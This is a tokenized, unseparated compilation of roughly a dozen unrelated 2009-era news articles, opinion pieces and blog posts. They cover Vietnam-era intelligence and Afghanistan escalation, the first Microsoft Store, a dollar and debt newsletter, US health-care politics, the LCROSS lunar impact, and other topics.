If the U.S. were to introduce x thousand additional troops into South Vietnam , will Hanoi quit ?
Okay , how about xx thousand ?
Our answers regularly earned us brickbats from the White House for not being " good team players . "
But in those days we labored under a strong ethos dictating that we give it to policymakers straight , without fear or favor .
We had career protection for doing that .
And — truth be told — we often took a perverse delight in being the only show in town without a policy agenda .
Our judgments ( the unwelcome ones , anyway ) were pooh - poohed as negativism ; and policymakers , of course , were in no way obliged to take them into account .
The point is that they continued to be sought .
Not even Lyndon Johnson , nor Richard Nixon , would be likely to decide on a significant escalation without seeking the best guess of the intelligence community as to how U.S. adversaries would likely react to this or that escalatory step .
Wrong : No NIE
Here ’s the thing .
Would you believe there is no current National Intelligence Estimate on Afghanistan ?
Rather , Generals David Petraeus and Stanley McChrystal are running the show , allowing professional intelligence analysts to be mostly straphangers at planning and strategy meetings .
CIA Director Panetta , a self - described " creature of Congress , " is not going to risk putting any senior military noses out of joint by objecting , and neither is his nominal boss , Director of National Intelligence Dennis Blair .
And , sad to say , National Security Adviser James Jones , in deferring to the military , is serving President Obama just as poorly as Bush apparatchik Condoleezza Rice served President Bush .
How many " militants " are there in Afghanistan ?
How may " insurgents ? "
How do you draw a distinction between a militant and an insurgent ?
Could it be that these combatants are widely regarded , in many areas of Afghanistan , as resistance fighters ?
What would be the implications of that ?
When the Military Does the Packaging
Forty - two years ago , my CIA analyst colleague Sam Adams was sent to Saigon to have it out with the Army intelligence officers working there for Gen. William Westmoreland .
After several months of exhaustive analysis , Adams had connected a whole bunch of dots , so to speak , and concluded that there were more than twice as many Vietnamese Communists under arms as the Army would carry on its books .
Bewildered at first , Adams quickly learned that Westmoreland had instructed his intelligence staff to falsify intelligence on enemy strength , keeping the numbers low enough to promote an illusion of progress in the war .
After a prolonged knock - down - drag - out fight , then - CIA Director Richard Helms decided to acquiesce in the Army ’s arbitrary exclusion from its enemy aggregate total paramilitary and other armed elements numbering up to 300,000 .
These categories had been included in previous estimates because they were a key part of the combat force of the Communists .
The Adams / CIA best estimate was total Communist strength of 500,000 .
However , it was the doctored estimate that went to the President and his advisers in November 1967 .
That was just two months before the countrywide Communist
Tet offensive in late January / early February 1968 proved — at great cost — that Adams figures were far more accurate than the Army’s .
Years later , when Adams and CBS told the story of this internal battle on " 60 Minutes , " Westmoreland sued , giving Adams his day in court , literally .
Subpoenaed documents and the testimony of Westmoreland ’s own staff in Saigon established the accuracy of Adams ’ charges , and Westmoreland withdrew his suit .
Yet , right up until his premature death at age 55 , Sam Adams could not dispel the remorse he felt at not having gone public with his findings much earlier .
He felt that , had he done so , the entire left half of the Vietnam memorial would not be there , because there would be no names to carve into the granite for those later years of the war .
Ellsberg ’s Regret
In recent years , former Defense Department and RAND analyst Daniel Ellsberg also has expressed deep regret that he waited too long ; that he did not give the press the " Pentagon Papers " history of the Vietnam War and its many deceptions until 1971 .
What few people know is that a couple of patriotic truth - tellers , including Ellsberg , did reveal key facts about the war in the late Sixties , when they learned that the Johnson administration was working on plans to expand the ground war into Cambodia , Laos and right up to the Chinese border — perhaps even beyond .
In 1967 , the beribboned , bemedaled Petraeus — sorry , I mean Westmoreland — addressed a joint session of Congress during which he congratulated himself on the " great progress " being made in the war .
Congress was unaware that Westmoreland was on the verge of getting President Johnson to agree to sending 206,000 more troops for a widening of the war that threatened to bring China in as an active combatant .
Two key leaks to the New York Times helped put the kibosh on that escalation .
The first , on March 10 , 1968 , revealed the 206,000 escalation figure ; and the second , on March 19 — by Ellsberg himself — disclosed the suppression of the CIA ’s higher , accurate count of Vietnamese Communists under arms .
On March 25 , Johnson complained to a small gathering of confidants :
" The leaks to the New York Times hurt us . …
We have no support for the war . … I would have given Westy the 206,000 men . "
I believe that President Obama wants to make the right decision regarding Afghanistan .
For me , his poignant visit Thursday night to the U.S. Air Force Base at Dover , Delaware , to receive the coffins of 18 Americans recently killed in Afghanistan bespeaks an authentic desire to do the right thing and face into any political repercussions .
It is clear , at the same time , that he is under great military and political pressure to send more troops on what those of us who experienced Vietnam are convinced is a fool ’s errand .
And , sadly , his national security adviser and his intelligence chiefs seem to have gone AWOL .
For Intelligence Analyst Colleagues :
One clear lesson from what Ellsberg did in March 1968 — not to mention the November 2007 NIE on Iran — is that patriotic truth telling , official or unofficial , can prevent wider wars .
And so I address you all — both my erstwhile colleagues and newer analysts in the intelligence community :
Those of you working on Afghanistan and Pakistan have your own educated estimates of the prospects for success of various U.S. courses of action .
If you have not been asked by now to prepare a National Intelligence Estimate , wait no longer .
Keeping silent is not a responsible option .
The President should not be deprived of your views .
Perhaps it was serendipity ( or maybe a reward for sitting through the entire RAND event Thursday morning ) , but that evening I was privileged to attend the Washington premier of an excellent documentary on Dan Ellsberg — " The Most Dangerous Man in America " — the sobriquet he earned from Henry Kissinger when Ellsberg gave the Pentagon Papers to the New York Times and other newspapers .
The film contained hard - to - watch footage of the war that took the lives of two - to - three million Vietnamese and 58,000 Americans — a very painful reminder .
I was happy to see , though , that the film did pick up , from Ellsberg ’s book Secrets , his decision to begin revealing important facts to the New York Times in early 1968 and help prevent a still more dangerous escalation and widening of the war in Vietnam .
Think about it , friends .
And do n’t look just at one another .
Visualize instead all those young people from our country ’s inner cities and small towns who form the pool for the de facto poverty draft that provides the bulk of U.S. troops sent off to bear the present - day White Man ’s Burden .
You may be in a position to help give the President the wherewithal to resist pressure to escalate the war in Afghanistan .
Let ’s stop the Dover deliveries of the dead headed to tombstones white , with the names of the late deceased .
Microsoft served notice on archrival Apple on Thursday with the Scottsdale opening of what will likely become a global chain of retail electronics stores .
The first Microsoft Store , located behind a sleek storefront at Scottsdale Fashion Square , is the software giant 's answer to its competitor 's international chain of 275 Apple Stores .
While Apple Stores primarily sell Apple computers , iPhones and iPods , the Microsoft Store carries products from a variety of manufacturers .
There are Panasonic televisions , Bang & Olufsen headphones , Dell computers and LG telephones , among many others .
All of the products , however , run on Microsoft 's Windows 7 operating system , which was released concurrent with the store opening .
" We are a software company , but we also want to be a successful retailer , " said Kevin Turner , Microsoft 's chief operating officer , in Scottsdale on Thursday .
Those products have in the past been sold mainly through intermediate resellers such as Best Buy and Walmart , which kept Microsoft from interacting directly with its customers .
" The moment of truth is when someone is standing in front of you wanting to buy something , " Turner said .
Besides making money selling electronics and software , Microsoft hopes the stores will provide a more intimate relationship with its estimated 300 million customers that will lead to more successful products .
The company plans to open a second store in Mission Viejo , Calif. , later this month and may open more , based on the success of the two pilot locations .
If the initial turnout in Scottsdale on Thursday is any indications , more stores will follow quickly .
Dozens of people spent the night in the mall 's parking lot to be first inside the new store .
Jim Butera of the Police Department said there were 100 people waiting when he arrived at 6 a.m. , and he estimated that 1,500 to 2,000 people had been through the store in a few hours after the 10 a.m. opening .
The incentive to camp out was provided by an offer of free Ashley Tisdale concert tickets to the first 1,000 customers .
The Microsoft Store feels like an Apple Store , with light wood floors , clean , minimal spaces and products around the periphery for customers to test - drive .
One hundred twenty monitors form a video wall that curves around the store 's interior and occasionally treats customers to a panoramic sunrise over the Grand Canyon .
There is a help desk at the rear , similar to Apple 's Genius Bar , where customers can have their electronic products troubleshot and repaired .
" It 's absolutely brilliant , " Kim Bailey of Chandler said .
" There was a lot of product , and everyone was very helpful . "
The prices are competitive , but Microsoft does n't intend to be a low - price competitor .
Instead , it is betting that people will choose the store 's selection , atmosphere and high level of customer service over price .
The " Dis-Savings " Glut
This morning the price of oil rose over $ 79 .
Gold is trading at $ 1,051 … about one - tenth the price of the Dow .
The Dow fell 67 points on Friday .
Investors began to wonder if the news coming from the banks was as good as the first reports indicated .
For example , the Bank of America reported losing a billion dollars on its consumer accounts .
It is all very well for JPMorgan and Goldman to make money .
They ’re investment banks .
And they ’re making money thanks to the US government ’s generous bailouts .
They pay almost nothing for borrowed funds … in dollars , of course .
And then they take the money and bet against the dollar .
So far , those bets are doing pretty well .
Meanwhile , the Bank of America is a real bank .
With real mom and pop customers .
And the poor moms and the poor pops are going bust .
They ca n’t pay their bills .
Or , at least so many of them ca n’t pay their bills that it cost BoA $ 1 billion in loans write - offs .
The LA Times reports that “ California job losses keep climbing . ”
The unemployment in LA county has reached 12.7 % .
Also , from LA comes news that millions of square feet of office space remain vacant .
Between LA county , Orange county , and the Inland Empire , there are some 51 million square feet of empty offices .
We do n’t know who owns all this vacant space .
But we can imagine who lent the money to build it – the big banks .
But lending money to customers is a tough way to earn a living .
The more you lend , the more you make … until you lend too much .
Then , you do n’t make anything .
Of course , speculating is a tough business too .
But it ’s a lot easier when you can borrow from the feds at practically zero interest and the government also guarantees your debts .
How can you lose ?
Do n’t worry , dear reader .
Bankers will find a way .
They always do .
Want an investment strategy that really works ?
Just figure out what the big banks are doing and do the opposite .
What are the big banks doing now ?
Mortgage lending ?
Nope .
Credit cards ?
Nope .
Business expansion ?
Are you kidding ?
How about mergers & acquisitions ?
Not really .
According to the news reports , the banks are making money by “ trading . ”
Trading what ?
Trading the dollar for things that are going up .
Look at the price of oil – over $ 79 .
And the price of gold – over $ 1050 .
Compared to each other – oil and gold – prices are stable .
But against the dollar both are rising .
In other words , people with dollars are trading them for oil and gold .
And not just oil and gold .
While US stocks have gone up 50 % or so in the last 7 months , emerging markets are up twice as much .
Argentine stocks – who would have believed it ?
– have doubled .
Indian stocks are up about 80 % .
Well , let ’s see …
If the big banks are getting rid of dollars … Hmmmm …
Do we want to get rid of dollars , too ?
Maybe not quite yet .
When speculators unwind all these short dollar / long oil , gold , stocks positions it will send the dollar flying .
Could the dollar surprise the speculators ?
Yes it could .
This weekend Tim Geithner told the world that the “ US must live within its means . ”
There was no word on how his audience reacted .
Surely some of his listeners must have giggled .
Maybe at least one guffawed .
A few must have rolled their eyes .
Here was the man in charge of the Treasury of the world ’s biggest spendthrift .
The papers announced this weekend that his deficit had reached a new record , over $ 1.4 trillion .
In other words , no nation ever lived as far beyond its means as the US .
In the 10 years , ’ 97 to ‘ 07 , consumers lived beyond their means .
Then , suddenly , the shock of ’07 - ’08 brought consumers to their senses .
Now , they ’re saving … now it ’s the government that is living beyond its means .
The New York Times tells us that the turnaround in household accounts has been breathtaking .
This year , the average household is expected to SAVE $ 4,643 .
As usual , the NYT misses the point all together .
It asks whether this is good for the economy and comes to the predictable conclusion that it is not .
If consumers do n’t spend , the consumer economy wo n’t grow .
At least you know , dear reader , what nonsense this is .
An economy only appears to grow from consumer spending .
When consumers spend money – especially when it ’s money they never earned – it triggers a phony boom .
The economy gears up to produce more stuff .
Then , when consumers have to repay their debts , the economy shrinks again .
That is the story of the US economy 2001 - 2009 .
A real boom , on the other hand , is one that results from increased earnings , not from debt .
When people earn more they can spend more – without going further into debt and without having to stop in order to pay back the money they borrowed .
But you do n’t get that kind of boom from consumer spending .
You get it from saving money … which is then invested in new tools that increase output .
More output = more earnings = more spending power = real economic growth .
Simple enough , right ?
But getting back to those savings …
If the average household saves $ 4,643 this year … that ’s about $ 500 billion savings for the entire nation .
Yet , the US government is running a budget deficit of 3 times that amount .
Are we missing something or is that net dis -saving of about $ 1 trillion ?
In other words , the US is going deeper and deeper into debt .
Whee !
Wait a minute .
Did n’t professors Reinhart and Rogoff just study nations that went too far into debt ?
And did n’t it show that once you take on too much debt it is impossible to escape trouble ?
Do n’t governments always go broke when they borrow too much ?
And does n’t it always lead to crises – banking crises , credit crises , currency crises and political crises ?
Yep .
Well , should n’t we be running for shelter ?
Yep .
Then , should n’t we be dumping the dollar ?
Yep .
But …it ’s not that simple .
Markets always try to sucker in as much money as possible .
Right now , people are afraid of the dollar .
Just this weekend , the nations of Latin America began an initiative to create their own regional currency – the sucre – to compete with the dollar .
And with gold and oil rising , many investors – especially the big banks – are betting heavily against the greenback .
Would n’t it be just like Mr. Market to engineer a dollar rally … BEFORE we have a dollar collapse ?
Yep .
*** Foreclosures are up 5 % from the summer to the fall .
Poor Donald Trump .
Buyers of his condos in Miami are suing him .
Prices have plummeted .
Buyers think The Donald is at fault .
*** And poor Ted Turner is in the news too .
He ’s down on his luck … and down to his last $ 2 billion .
Jane is gone .
So is CNN .
He ’s struggling to “ stay relevant , ” by working on women ’s rights issues and fighting global warming .
And he ’s getting in tune with the times by downsizing :
“ I ’ve had the experience of being on top and riding the roller coaster down again , nearly to the bottom .
You know , if you economize and do n’t buy new airplanes or long - range jets , or that sort of thing , you can get by on a billion or two . ”
***
This weekend we went to look at a friend ’s house out in the country .
He had built it himself … with help from his sons .
It was a beautiful stone cottage , perfectly proportioned with French - style windows , shutters , and a clay tile roof .
On the inside , was a terra cotta floor , exposed beams , and a wood stove .
“ Yes , we just built it ourselves .
You know , nowadays you ca n’t do this .
You certainly can’t do this in England .
I ’m sure you ca n’t do it in America either .
But we just did n’t say anything about .
And we did it all ourselves so not many people knew about it . ”
The house was hidden from the road by a dense hedge .
“ And cheap ?
The whole house barely cost anything .
We got a few truck loads of stone delivered .
Then , I just bought mortar – one bag at a time – as I needed it .
We recycled the floor tile .
And the roof tile too .
And we made the wood beams ourselves .
We just cut down a couple trees and then cut them to the sizes we wanted .
It took a little time .
But we just did it on weekends and vacations .
One of my nephews came to help too .
It was fun .
“ The only things that really cost money were the roof tiles , which we had to buy …and the doors and windows , which we had made by a local woodworker .
Everything else was very cheap or we found it or recycled it ourselves .
So , in the end , we have a nice house with no mortgage . ”
*** And here ’s something interesting .
Harrods is selling gold bars :
“ From this morning , Harrods will start selling gold bullion and coins over the counter .
In a sign that the credit crisis has left his gilded customer base largely untouched , Harrods owner Mohamed Fayed has teamed up with Produits Artistiques Métaux Précieux ( PAMP ) , the Swiss refiner , to sell gold in the store .
Aimed at private investors , the gold will be sold at the Harrods Bank branch on the lower ground floor of the West London store . ”
Until tomorrow ,
Bill Bonner
The Daily Reckoning
Republican senators trying to kill healthcare reform have acted irresponsibly , one of their former colleagues asserted .
Former Sen. Chuck Hagel ( R - Neb . ) chided some of his former colleagues who have suggested that halting healthcare reform would be politically beneficial to the GOP .
" If your attitude is wrong , if your intention is to use healthcare to destroy the other party , or to destroy the presidency of Barack Obama , then it 's very unlikely you 're going to find much consensus from people who want to use healthcare , " Hagel said earlier this month in a speech at the University of Michigan , video of which was only made available recently .
" As some Republican senators have said publicly -- that if we kill Obama on this , and we destroy this , and we defeat his , that will drive a stake through his political heart on this administration , " the former senator , who retired at the end of his term in January , added .
" I just find that about as irresponsible of a thing as I can think of . "
By the time Hagel had left office , he had been somewhat of an open critic of some elements within the Republican Party , and had declined to endorse the party 's presidential nominee , Sen. John McCain ( R - Ariz . ) during the presidential election .
Hagel said during his speech that it would have been " wrong " for him to endorse McCain despite serious reservations about some of the people McCain had surrounded himself with during the campaign .
" John McCain is a very close friend .
But John and I , our view of the world -- the wars , foreign policy , the people that John had around him -- I just could not support that , " Hagel explained .
" You 've got to follow your own conviction and conscience .
It would have been wrong to do that , for me , " Hagel added .
" I just could n't agree with John on a lot of this stuff .
And I thought a lot of people around John were dangerous .
I did n't want to see them in power . "
The former senator , who now serves as a professor at Georgetown University and the University of Nebraska , said he declined to endorse now - President Barack Obama because he vowed to not do anything in the campaign to hurt McCain .
ADVERTISEMENT
But Hagel revealed that he still speaks with Obama administration officials , including the president , with some regularity .
Hagel 's name has been rumored as in contention for a cabinet position , potentially secretary of Defense , for Obama .
Hagel was asked whether he would run as a Republican if he were to seek office again , a question the Nebraska native did not answer directly .
" I would run as Chuck Hagel .
I always have , " he said .
" If I 'd run again , I 'd run on my record , and who I am , and that 's the way I 'd do it . "
Watch the video of the speech below :
T shirt screen printing is actually a young industry .
It was only in the 60s that screen printing t shirts with hippie symbols and images became popular .
The laid - back comfort of wearing a t shirt coupled with the avant - garde designs appealed to the free - spiritedness of the hippie generation .
Even the origins of the t shirt and the screen printing process reflect the revolutionary nature of the hippies .
Manual Screen Printing As An Art
While the process of screen printing may be old with printers in ancient China doing it manually using a silk mesh , screen printing as an artistic medium did not become popular until the 1930s in the US when artists began to use the process in creating their artworks .
This type of screen printing , referred to as “ Serigraphy ” to distinguish between the artistic applications of screen printing from the industrial use of the process , was further popularized by Andy Warhol , who used it in his famous 1962 work depicting Marilyn Monroe in garish colors .
Using A T Shirt Screen Printing Machine
Screen printing has many variations in spellings and terms , but the most commonly associated with the process is silk screen printing .
Although printers in China used to make screen printing meshes with silk , today ’s screen printing meshes are made with polyester , which is far cheaper and easily available from suppliers .
Not only that , the ink used in t shirt screen printing is now more durable and less toxic compared to previous inks .
They are also available in various shades and tints .
This multicolor capability extends the types of designs that screen printing on t shirts can produce .
The practice of manual screen printing on t shirts was a trade known and practiced only by the artisans of the industry .
However , massive production of screen - printed t shirts was only made possible when Michael Vasilantone invented the rotary screen printing machine .
He originally invented the multicolor screen printing machine for use on bowling garments .
However , it was not long before garment manufacturers used the machine for manual screen printing on t shirts because it made commercial production faster .
The Commerce Of T Shirt Screen Printing
Screen printing on t shirts was first used for commercial purposes before artists began using the process to create art on t shirts .
In the 1950s , companies began screen printing t- shirts with designs and logos of resorts and various characters such as Disney ’s Mickey Mouse and Dave Crockett .
The business of t shirt printing became highly profitable when the demand for printed t- shirts rose in the 70s .
Designs depicted range from images of peace and freedom to revolutionary personalities such as Che Guevarra as representation of rebellion .
Other designs include emblems and motifs of bands like the Grateful Dead and of the marijuana culture .
In fact , you can find more ideas on designs like these for t shirt screen printing at Tshirtprinting .
net .
Share this : Twitter
Facebook
Like this : Like Loading ...
Tags : printed t shirts , t shirt screen printing , tshirtprinting .net
Googleに比べるととっても地味なPRしかしていないが、実はFacebookのエンジニアリングも結構すごい。CTOのJeff RothschildがUCSDで講演したビデオが見れるので今日がある方は是非見た方が良いと思います。
ビデオを見たのが昨日なので、全部覚えていませんが、覚えていることだけでメモを書いておきます。全般的に、非常に素直な講演で、自分たちの良いところも悪いところも素直に言ってしまっているという印象です。（普通、この手の講演だと自分たちが優れていることだけを言うのですが、これまでどういうところで苦労してどうやって克服しようとしているか、みたいなことがとても良く分かります。）
ビデオを見て頂ければ分かりますが、Googleとはベクトルが違うものの、やはり相当技術的にもすごいです。単にPRしていない、あるいは下手なだけですね。
元 Yahoo!のコアなエンジニアたちが相当FBにいると聞きますので、是非興味がある方はビデオをご覧ください。
エンジニア一人が支えるユーザー数 はGoogle等の列強と比べても何倍も多い。（この話はいつも採用イベントで出てくる。）
最初の1億ユーザーになった時は、エンジニアが2人しかいなかった（うち一人はCEOw）。
基本的にフロントエンドは今でも全部PHPで作っている。
PHPの最大の良さは、何と言っても簡単に作れること。 他方、PHPにも悪いところがたくさんある。リクエストが増えると処理が遅くなるなど。その辺はFBでPHPに改良を入れて、OSSにフィードバックしたりしている。
分散ファイルシステムも結局自作した。 主に写真をどう配置して、どう配信するかというところ。 最初は高いNASとか買っていたけれど、壊れるしスケールしないし、ということで自分たちで作るしかなかった。
でも最初にパッケージ製品を使っていたおかげで、どういう部分がボトルネックになるのかが良く分かった。そこを直すように作った。
DBは基本的にmySQL 。 mySQLのエンジン自体に改造してDBへ変更するとmemcachedのキャッシュも変更されるようにした。
最初は西海岸（確かサンフランシスコだと言っていた）にしかDCがなかったが、東海岸に新たに設置したDCとDCまたぎレプリケーションしてる、みたいなことを言っていた。
Crashing a rocket into the Moon will create “ one more dimple ” on the lunar surface and could find water ice on Earth ’s nearest neighbour , according to a Durham University expert .
Dr Vincent Eke ’s research has helped inform NASA ’s decision about where to crash its probes into the Moon ’s surface in search of water .
The Lunar CRater Observation and Sensing Satellite ( LCROSS ) and its Centaur rocket will smash into a crater in the Cabeus region of the Moon ’s South Pole next week .
Impact has been timed for approximately 12.30 pm BST ( 4.30 am PDT ) on Friday , October 9 .
Approximately 350 tonnes of material will be propelled into the sunlight so scientists can study its composition using ground - based telescopes .
Cabeus was identified in a previous study led by Dr Eke as a site with high concentrations of hydrogen – a key element in water .
According to the findings , water in the form of ice could be found in the frozen confines of the Moon ’s polar craters where temperatures are colder than minus 170 degrees Celsius .
advertisement
Sept. 2009 data from three spacecraft , including India ’s Chandrayaan - 1 probe , showed that small amounts of H2O coated particles that make up the Moon ’s soil .
Dr Eke , in the Institute for Computational Cosmology , at Durham University , said : “ Water ice could be stable for billions of years on the Moon provided that it is cold enough .
“ If ice is present in the permanently shaded lunar craters of the Moon then it could potentially provide a water source for the eventual establishment of a manned base on the Moon .
“ Such a base could be used as a platform for exploration into the further reaches of our solar system . ”
Dr Eke said people should not worry about the effect the collision could have on the Moon .
advertisement
He added : “ The rocket has roughly the mass of a Transit van and it will hit the Moon at about 5,600 miles per hour .
The energy of the collision is roughly equivalent to two tonnes of TNT .
“ While this sounds dramatic , the impact of this will simply create one more dimple on the moonscape .
“ The cratered surface of the Moon shows it has a history of violent collisions with asteroids and comets .
“ Such collisions frequently occur , but the difference is that this time we know precisely where and when to look . ”
Dr Eke ’s previous study analysed data from NASA ’s 1998 Lunar Prospector mission , which showed that hydrogen was concentrated in the permanently shaded craters of the Moon ’s polar regions .
If hydrogen is present as water ice , then the data would imply that the top metre of the surface in these craters holds about 200,000 million litres of water in total .
Dr Eke ’s research , published in the International Journal of Solar System Studies , Icarus , was carried out in collaboration with Dr Richard Elphic and Dr Luis Teodoro , who work in the Planetary Systems Branch at NASA Ames Research Center in the USA .
The research was funded by a Royal Society University Research Fellowship and the NASA Lunar Reconnaissance Orbiter Participating Scientist Programme and a Leverhulme Research Fellowship .
Journalist Lou Dobbs says gunshots were fired at his New Jersey home this month after a series of threatening phone calls to his residence .
The CNN Host of " the Lou Dobbs Show " told listeners on his nationally syndicated radio show that he believes the incident is related to his outspoken views on immigration .
Dobbs is a fervent proponent of U.S. border enforcement .
" They 've created an atmosphere and they 've been unrelenting in their propaganda , " Dobbs said in reference to pro-immigration groups .
" Three weeks ago this morning , a shot was fired at my house where I live .
My wife was standing outside and that followed weeks and weeks of threatening phone calls . "
New Jersey State Police told media outlets that troopers were called to the Dobbs ' estate in Wantage , N.J. , at about 10:30 a.m. on Oct. 5 .
Investigators at the scene were told that Dobbs and his wife were outside their home when they heard a gunshot , and a bullet struck their attic .
The bullet was located and is being analyzed , law enforcement officials said .
No injuries were reported and police said an investigation is under way .
Secretary Kathleen Sibelius said the public option was n't an essential component of reform , though yet another anonymouse later insisted that she misspoke .
( Arguably , a Freudian slip is a manner of misspeaking . )
At Netroots Nation , key Obama adviser Valerie Jarrett made it clear that the " American people " were going to have to push the Blue Dog Democrats .
Because the White House was n't going to .
Over the past several days , there 's been a pattern out of the White House .
On Saturday , Obama told a town hall in Colorado that a public option was just that , an option -- not the be - all - end - all of reform .
If the president really favors a public option , why would members of Obama 's inner circle undermine him in the Washington Post ?
The foregoing paragraphs sparked massive speculation when they appeared on the front page of Washington Post yesterday in a story by Michael Shear and Ceci Connolly .
" It took on a life of its own , " he said .
[ WaPo ]
Another top aide expressed chagrin that a single element in the president 's sprawling health - care initiative has become a litmus test for whether the administration is serious about the issue .
" It 's a mystifying thing , " he added .
" We 're forgetting why we are in this . "
" I do n't understand why the left of the left has decided that this is their Waterloo , " said a senior White House adviser , who spoke on the condition of anonymity .
" We 've gotten to this point where health care on the left is determined by the breadth of the public option .
I do n't understand how that has become the measure of whether what we achieve is health - care reform . "
The Republicans have made it clear that they will attempt to filibuster any bill that 's put before them .
On a good day , the Democrats have 60 senate votes , which is enough to break a filibuster , but only if all 60 fall in line .
That gives potential defectors a lot of power .
Enumerable compromises have already been made in the hopes of securing the support of the conservative Blue Dogs .
The last straw was when Sen. Kent Conrad ( D - ND ) , a member of the committee tasked with writing the senate bill , went on Fox News to declare the public option dead .
The liberal base is pissed .
Even the Associated Press took time out of its busy schedule to register our disaffection .
Washington takes it for granted that the Blue Dogs can and will scuttle any healthcare bill they do n't like .
It 's considered their divine right to veto any bill that displeases them .
If the Blue Dogs ultimately vote against the bill , the Serious People will blame the progressives for trying the Blue Dogs ' patience .
But if progressives vote against the bill , nobody will blame the Blue Dogs for their imperious intransigence .
With such a narrow margin of victory , liberal senators could exert the same kind of leverage .
What if Bernie Sanders refused to vote for a bill without a public option ?
Now , that would be an impetus for negotiation .
The White House would suddenly have an incentive to stand up to the Blue Dogs on the Finance Committee .
If they do n't write a bill that the progressives will pass , healthcare reform will die .
Of course , the White House would rather preempt a two - front war in the Senate .
I suspect that they 're using strategic leaks to subtly psych out the progressives .
Notice how Anonymouse 1 ( cough , cough , Rahm Emanuel ) uses the phrase " their Waterloo , " echoing the Republicans ' threat to make healthcare Obama 's Waterloo .
The implication is clear .
" The left of the left " had better fall in line or everyone will blame them .
The Daily Beast has a piece today by John Avlon headlined , " The Coming Liberal Suicide , " a cautionary tale about how everyone will blame liberals for getting hung up on that crazy fringey dirty hippie " public option " of theirs .
Joe Klein , who conducts the conventional wisdom like copper conducts electricity , goes even further : " This year , the liberal insistence on a marginally relevant public option has been a tactical mistake that has enabled the right 's " government takeover " disinformation jihad . "
So , it 's already our fault and we have n't even done anything .
Optimistic progressives see the Washington Post 's anonymice as self - serving rogues .
I think they were on message all along .
Thousands of Russians are watching a YouTube video that accuses their government and officials of high corruption .
A Russian version of a video by Hermitage Capital , the London - based hedge fund claiming to be victim of a $ 230 m ( £ 146 m ) scam , has attracted over 12,000 hits , and is the most viewed news clip on YouTube in Russia , the site shows .
The English version has had almost 8,000 viewings .
William Browder , head of Hermitage Capital , hopes the video 's international impact will put pressure on the Russian authorities to listen to his claims of theft , gangsterism and government corruption .
" It 's a true Kafka - esque type of situation , " Browder says in the video .
" It 's one thing to be victimised by a crime , it 's another thing to be blamed for the crime that you 're a victim of . "
Browder has been banned from entrance to the country and has removed his staff from the fund 's offices in Moscow after police raids .
However , one lawyer working for Hermitage , a 37 - year old father of two , is still in prison .
Hermitage alleges that its position as Russia 's largest foreign investor two years ago made the establishment nervous , leading to Browder being denied entry to the country .
His petition for a new visa led to a string of threats that ended up with the police raiding Hermitage 's Moscow offices , seizing all its documentation .
The video contains reconstruction of the raids and also the transcript of a telephone call from a tax official which the company alleges contains blackmail threats .
The Russian interior ministry is still seeking to have Browder returned to Russia for questioning , Irina Dudukina , a ministry spokeswoman told Bloomberg News by phone today .
The executive was placed on the ministry 's international wanted list on charges of tax evasion .
However , according to the fund , the criminals used a network of corrupt lawyers , police and judges to fake transactions and simulate that three profit - making Hermitage subsidiaries had turned a profit into losses – for which they demanded a tax rebate .
The new owners of the stolen companies received Russia 's biggest ever rebate within two days , the video claims .
" The $ 230 m which belonged to the Russian people had been stolen by the criminals in an organised conspiracy supported by corrupted officials in the higher reaches of the Russian state , " the video says .
" The story sounds like a thriller but is n't and it 's being repeated every day . "
Hermitage has several legal suits opened in Russia and plans to continue its battle : " We will overwhelm them with transparency .
Evil tends to wither under the bright light of publicity , " Browder says .
Orly Taitz accused of suborning perjury for Barnett v. Obama - - updated including affidavit , etc .
September 15 , 2009
Affidavit to be Filed with Federal Court in Santa Ana Today
I have tried to stay neutral in the cases of Orly Taitz and have even tolerated the attacks from her and her supporters .
I will no longer .
Orly Taitz needs to be held accountable and responsible for her actions and her actions need to be made public .
I tried to be as polite as possible when explaining how I was contacted by Orly Taitz and what transpired on September 7 , 2009 in personal meetings with her .
Seems Taitz and her supporters have decided they need to engage in attacks and making false statements in a chat room by the name of " Tavern of the Ghost Spider " and other sites to try and keep up the FRAUD that I am now convinced Orly Taitz is engaged in .
Allow me to correct one thing being claimed by Taitz and her marks : Orly Taitz at no time was in any airport with me and never once yelled at me anywhere .
Now to make such claims is a bit telling as to her motives .
Later today I will be faxing to the United States District Court in Santa Ana , California as well as to the U.S. Attorney 's Office an Affidavit informing Judge Carter that on September 7 , 2009 Orly Taitz did knowingly and intentionally ask me to appear before his Court on September 8 , 2009 and give knowingly false testimony for the purpose of obtaining " expedited discovery , " and to gain publicity for my book .
I have made it clear from my first going public on YouTube January 17 , 2008 that I will stand by the truth and would not allow anyone to misrepresent my statements nor would I be dishonest in any way .
Orly Taitz as an officer of the court engaged in behavior that if allowed to go unquestioned will harm any and all valid claims made on Barack Obama 's eligibility now or in the future .
In the words of an Orly Taitz supporter , " She can't lie and ask others to lie at the same time accusing Obama of lying .
Lets get to the truth but we have to be honest in doing so . "
The sworn affidavit will be provided to other web sites for posting in ifs PDF format for downloading by anyone who wants a copy .
< NOSPAM >
By Arlen Williams
This is the breaking news mentioned last night in Investigating Obama and The Awakening .
Below is a post by Larry Sinclair , from his blog , " ... on all things Obama , " about what he indicates he was asked by Dr. Taitz , to do .
The affidavit ( loading may take a couple minutes ) : Larry Sinclair 's fax cover sheet ( click to enlarge ) : Larry Sinclair 's mail to the U.S. District Court involved ( Sinclair explained , they do not take faxes ) : I.O. repeats the call : do you also know of significantly unethical or even illegal behavior on the part of Orly Taitz , as it pertains to the movement for constitutional justice regarding Barack Obama , by the constitutional standards for If so , please email arlenwilliams@yahoo.com .
I want to help you .
We the People of the United States of America are owed competence , honesty , and allegiance , in this matter .
Please see immediately prior I.O. article on Orly Taitz and Barnett v. Obama and its comments , for more reality . ©
Arlen Williams
MEXICO CITY , Mexico ( CNN ) --
The Mexican government on Sunday dissolved the company that supplies power to the capital and four central states because of the utility 's unsustainable financial position , Interior Minister Fernando Gomez Mont said .
Police erect a barrier outside the offices of Luz y Fuerza del Centro in Mexico City .
Hundreds of federal police officers seized the facilities of the company , Luz y Fuerza del Centro , in Mexico City and the states of Hidalgo , Mexico , Morelos and Puebla .
Luz y Fuerza del Centro is a decentralized public agency , incorporated as a company with its own assets .
The government dissolved the company because " its operations are no longer beneficial from the point of view of the national economy or the interests of the public , " Gomez Mont said at a news conference .
The Federal Electricity Commission , known by its Spanish initials , CFE , will take over operations .
Service will be uninterrupted , the government said .
Inefficiencies at Luz y Fuerza del Centro were costing the government billions of dollars in subsidies to keep the company afloat , Gomez Mont said .
At the current rate , the government would have to subsidize the company to the tune of 300 billion pesos ( U.S. $ 22.5 billion ) by 2012 , the minister said .
